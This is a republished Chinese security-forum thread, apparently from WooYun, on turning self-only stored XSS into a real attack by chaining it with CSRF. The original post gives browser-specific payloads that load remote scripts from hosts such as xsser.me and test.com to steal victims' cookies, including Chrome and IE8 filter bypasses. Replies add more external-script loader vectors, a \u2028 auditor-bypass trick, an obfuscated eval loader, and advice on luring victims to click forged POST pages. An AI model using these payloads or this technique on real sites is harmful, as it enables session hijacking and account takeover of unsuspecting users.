安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WooYun > WooYun-Zone > 存储型xss自己x自己的xss各个浏览器的用法

存储型xss自己x自己的xss各个浏览器的用法

时间:2016-11-02来源: 作者:点击:
存储型xss自己x自己的xss各个浏览器的用法
很多时候我们会碰到一些xss,自己编辑的时候没有过滤,但保存以后过滤了,点击编辑又会触发,这个时候会感觉很鸡肋对不对。

这个时候就会想能不能csrf去触发修改,这样受害者不是能够自己x自己了,我们也能收到想要了cookies了,基于这个想法只要找一些鸡肋的xss和没有做csrf的地方

1.firefox下基本没有任何对csrf+xss的防御,用户只要点击你的网址直接用

"><script src=http://xsser.me/*****></script>

就可以了

2.chrome下就要用到一个chrome的0day,sogili大牛提供的

"><svg><script xlink:href=//********></script> chrome的bypass

3.ie8,对于ie8来说过滤器还是满强大的,但二哥之前发过一个0day

WooYun: IE8 xss filter bypass (xss过滤器绕过)

//内容来自AnYun.ORG



再结合群里童鞋提供的

onerror="with(document)body.appendChild(createElement('script')).src='//test.com/js.js'"

这个方法来触发接收cookies就可以了

//ANYUN.ORG

以上三个案例都已经能够尝试能够成功获取到cookies,正好把那些鸡肋的cookies和无危害的csrf利用起来

//安云网咨询系统

上面的方法对反射型的xss应该也都是有作用的,不过缺点在于不能通杀,不知道大牛们能不能搞出通杀的

//本文来自安云网

//ANYUN.ORG

//copyright AnYun.ORG

  1. //内容来自安云网

    1#
    //内容来自AnYun.ORG

    z7y (小胖子首席鉴黄师) | 2013-01-03 23:22

    //安云网咨询系统

    @小胖胖要减肥 啊哈,此贴可以顶! //安云网咨询系统

    //安云网,anyun.org

    //copyright AnYun.ORG

  2. //内容来自AnYun.ORG

    2#

    //copyright AnYun.ORG

    YangCL | 2013-01-03 23:29

    //内容来自AnYun.ORG

    前排留名~~  学习咯~ //本文来自安云网

    //本文来自安云网

    //ANYUN.ORG

  3. //内容来自安云网

    3# //copyright AnYun.ORG

    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2013-01-03 23:30

    //安云网,anyun.org

    可以顶

    //安云网,anyun.org

    //内容来自安云网

    //内容来自安云网

  4. //ANYUN.ORG

    4#
    //copyright AnYun.ORG

    Sogili (.) 长短短 (.) | 2013-01-03 23:42

    //内容来自AnYun.ORG

    不错唉.. //安云网咨询系统

    //copyright AnYun.ORG

    //安云网,anyun.org

  5. //内容来自AnYun.ORG

    5#

    //内容来自安云网

    /fd (Http://prompt.ml) | 2013-01-04 00:07

    //本文来自安云网

    第三點該不是參考我的吧
    #7
    加個+new Date()可防止cache,比Math.random()短一些

    //安云网咨询系统

    //ANYUN.ORG

    //内容来自安云网

  6. //内容来自安云网

    6#

    //内容来自AnYun.ORG

    /fd (Http://prompt.ml) | 2013-01-04 00:10

    //内容来自AnYun.ORG

    額,我是指那句動態插入js的代碼不是第三點

    //本文来自安云网

    //内容来自AnYun.ORG

    //内容来自安云网

  7. //内容来自安云网

    7#
    //copyright AnYun.ORG

    小胖胖要减肥 | 2013-01-04 00:11

    //安云网,anyun.org

    @/fd 反正大家都是一个论坛的,资源共享嘛 //安云网,anyun.org

    //内容来自AnYun.ORG

    //copyright AnYun.ORG

  8. //内容来自AnYun.ORG

    8#

    //安云网咨询系统

    Sogili (.) 长短短 (.) | 2013-01-04 00:14

    //安云网咨询系统

    @/fd – =很常见的… //内容来自AnYun.ORG

    顺便分享几条群里讨论时发的短html加载外部script的vec:
    <iframe src='javascript:<script/src=//mmme.me></script>'>
    <svg/onload=appendChild(createElement('script')).src='//mmme.me'>
    <svg/onload=write('<script/src=//mmme.me></script>')>
    //安云网,anyun.org

    //内容来自AnYun.ORG

    //安云网,anyun.org

  9. //copyright AnYun.ORG

    9#
    //本文来自安云网

    /fd (Http://prompt.ml) | 2013-01-04 00:15

    //内容来自安云网

    說起來較早的Chrome版本可以透過line separator(\u2028) bypass auditor,而\u2028在地址欄又可以隱藏其後的query string…(釣魚?)

    //内容来自AnYun.ORG

    //内容来自安云网

    //ANYUN.ORG

  10. //安云网,anyun.org

    10#
    //安云网,anyun.org

    /fd (Http://prompt.ml) | 2013-01-04 00:16

    //本文来自安云网

    @Sogili 我也知道很常見,只是script的地址太巧合 //copyright AnYun.ORG

    //内容来自AnYun.ORG

    //安云网,anyun.org

  11. //ANYUN.ORG

    11# //安云网,anyun.org

    Sogili (.) 长短短 (.) | 2013-01-04 00:17

    //安云网咨询系统

    @/fd 这个bug在xss.js的最新版本中有使用 :D //ANYUN.ORG

    //安云网,anyun.org

    //内容来自AnYun.ORG

  12. //内容来自安云网

    12# //ANYUN.ORG

    Sogili (.) 长短短 (.) | 2013-01-04 00:19

    //本文来自安云网

    @/fd \u2028或许可以打破很多网站的js string.

    //copyright AnYun.ORG

    //copyright AnYun.ORG

    //本文来自安云网

  13. //内容来自AnYun.ORG

    13# //内容来自AnYun.ORG

    /fd (Http://prompt.ml) | 2013-01-04 00:22

    //安云网,anyun.org

    @Sogili 還有\u2029呢,看來ECMAScript及HTML5文檔的各種細節是知得愈多愈好

    //copyright AnYun.ORG

    //安云网,anyun.org

    //内容来自安云网

  14. //内容来自AnYun.ORG

    14# //copyright AnYun.ORG

    小胖胖要减肥 | 2013-01-04 10:37

    //ANYUN.ORG

    @/fd onload的那个怎么写的,还有其他的么,都贡献出来呀

    //内容来自AnYun.ORG

    //本文来自安云网

    //copyright AnYun.ORG

  15. //copyright AnYun.ORG

    15#
    感谢(1) //ANYUN.ORG

    se55i0n (那些年,我们一起看的岛国动作片~) | 2013-01-04 10:39

    //内容来自安云网

    @Sogili @/fd 大牛们多多总结呀~ //ANYUN.ORG

    //内容来自AnYun.ORG

    //内容来自AnYun.ORG

  16. //本文来自安云网

    16# //copyright AnYun.ORG

    小胖胖要减肥 | 2013-01-04 10:44

    //本文来自安云网

    @se55i0n 什么时候大牛来个简单的rootkit案例可以让我们这些小菜学习学习,慢慢进阶啊,直接gmail那个太高端了 //本文来自安云网

    //内容来自AnYun.ORG

    //内容来自安云网

  17. //安云网,anyun.org

    17#
    感谢(1)

    //内容来自安云网

    se55i0n (那些年,我们一起看的岛国动作片~) | 2013-01-04 10:48

    //内容来自安云网

    @小胖胖要减肥 人家那是换美刀的洞洞,我们只有慢慢打小怪兽升级咯~ //安云网,anyun.org

    //本文来自安云网

    //内容来自AnYun.ORG

  18. //安云网,anyun.org

    18#

    //安云网咨询系统

    xfkxfk | 2013-01-04 11:06

    //内容来自安云网

    @小胖胖要减肥 对于这个自己x自己得存储型xss,经常遇到,你说的编辑触发,保存过滤的也遇到了。想到过csrf,但是不知道具体怎么实现让受害者能自己x自己。首先受害者编辑的内容得是xss code,而后他要进行编辑操作,这个过程怎么实现啊?请大哥赐教。。。感谢先

    //内容来自AnYun.ORG

    //内容来自AnYun.ORG

    //ANYUN.ORG

  19. //内容来自AnYun.ORG

    19# //内容来自AnYun.ORG

    小胖胖要减肥 | 2013-01-04 11:16

    //安云网,anyun.org

    @xfkxfk 比如个人信息,你自己构造一个页面放别人的网站或自己的网站,也可以只是一个post的url,具体看场景,关键是诱使别人点击,比如发帖,说有好东西来看啊,点击后触发post请求,修改个人信息并提交保存,xss code就是某个字段,csrf的wooyun例子很多,具体场景看具体怎么利用吧

    //安云网,anyun.org

    //ANYUN.ORG

    //copyright AnYun.ORG

  20. //copyright AnYun.ORG

    20#
    //ANYUN.ORG

    xfkxfk | 2013-01-04 11:26

    //安云网,anyun.org

    @小胖胖要减肥 嗯,原理明白了,下来的慢慢实践,感谢!

    //copyright AnYun.ORG

    //copyright AnYun.ORG

    //内容来自安云网

  21. //安云网咨询系统

    21# //ANYUN.ORG

    txcbg | 2013-01-04 17:17

    //安云网咨询系统

    学习下

    //copyright AnYun.ORG

    //内容来自AnYun.ORG

    //本文来自安云网

  22. //安云网,anyun.org

    22#
    //安云网,anyun.org

    erevus | 2013-01-04 20:52

    //本文来自安云网

    求IE10的 //ANYUN.ORG

    //本文来自安云网

    //copyright AnYun.ORG

  23. //ANYUN.ORG

    23# //内容来自安云网

    小胖胖要减肥 | 2013-01-04 23:39

    //本文来自安云网

    现在短链用不了了,发射型的比如g牛这个WooYun: 腾讯微博一处两用DOM-XSS,能反射,能后门,用csrf来搞直接dom,还能自动跳转到那个搜索页触发xss,这个例子很好啊,就是修复了

    //copyright AnYun.ORG

    //ANYUN.ORG

    //ANYUN.ORG

  24. //安云网,anyun.org

    24# //安云网,anyun.org

    小胖胖要减肥 | 2013-03-05 15:30

    //copyright AnYun.ORG

    加上一个 var obj=document.createElement(“script”);eval(“obj.s”+”rc=xxxxx”);document.body.appendChild(obj);

    //copyright AnYun.ORG

    //安云网咨询系统

    //ANYUN.ORG

  25. //本文来自安云网

    25#

    //本文来自安云网

    zsx (‮‮ ‮捣乱不犯法) | 2013-03-05 22:12

    //安云网咨询系统

    我说这样还不如诱使受害人打开网页–>F12CONSOLE–>粘贴你给的JS代码呢。。 //copyright AnYun.ORG

    //内容来自安云网

    //内容来自AnYun.ORG

  26. //本文来自安云网

    26# //内容来自AnYun.ORG

    小胖胖要减肥 | 2013-03-06 11:39

    //安云网,anyun.org

    @zsx 你没看懂撒 这个是借刀杀人 //copyright AnYun.ORG

    //安云网,anyun.org

    //本文来自安云网

  27. //ANYUN.ORG

    27# //copyright AnYun.ORG

    MEng | 2013-03-06 11:47

    //本文来自安云网

    受益了,XSS自己的还是经常遇到过

    //内容来自AnYun.ORG

    //内容来自安云网

    //安云网咨询系统

  28. //安云网,anyun.org

    28#
    //本文来自安云网

    txcbg | 2013-03-06 12:21

    //安云网咨询系统

    收藏 //ANYUN.ORG

    //内容来自AnYun.ORG

    //本文来自安云网

  29. //ANYUN.ORG

    29#
    //安云网,anyun.org

    奎尼 (>///<”‘) | 2014-02-19 13:58

    //安云网咨询系统

    用回旋镖多好。 //安云网,anyun.org

    //ANYUN.ORG

    //ANYUN.ORG

  30. //ANYUN.ORG

    30#

    //安云网,anyun.org

    eGirlAsm (妈妈说,长得帅不能到处乱说.) | 2014-02-19 20:19

    //内容来自AnYun.ORG

    xss是干什么用的?

    //内容来自安云网

    //本文来自安云网

    //copyright AnYun.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容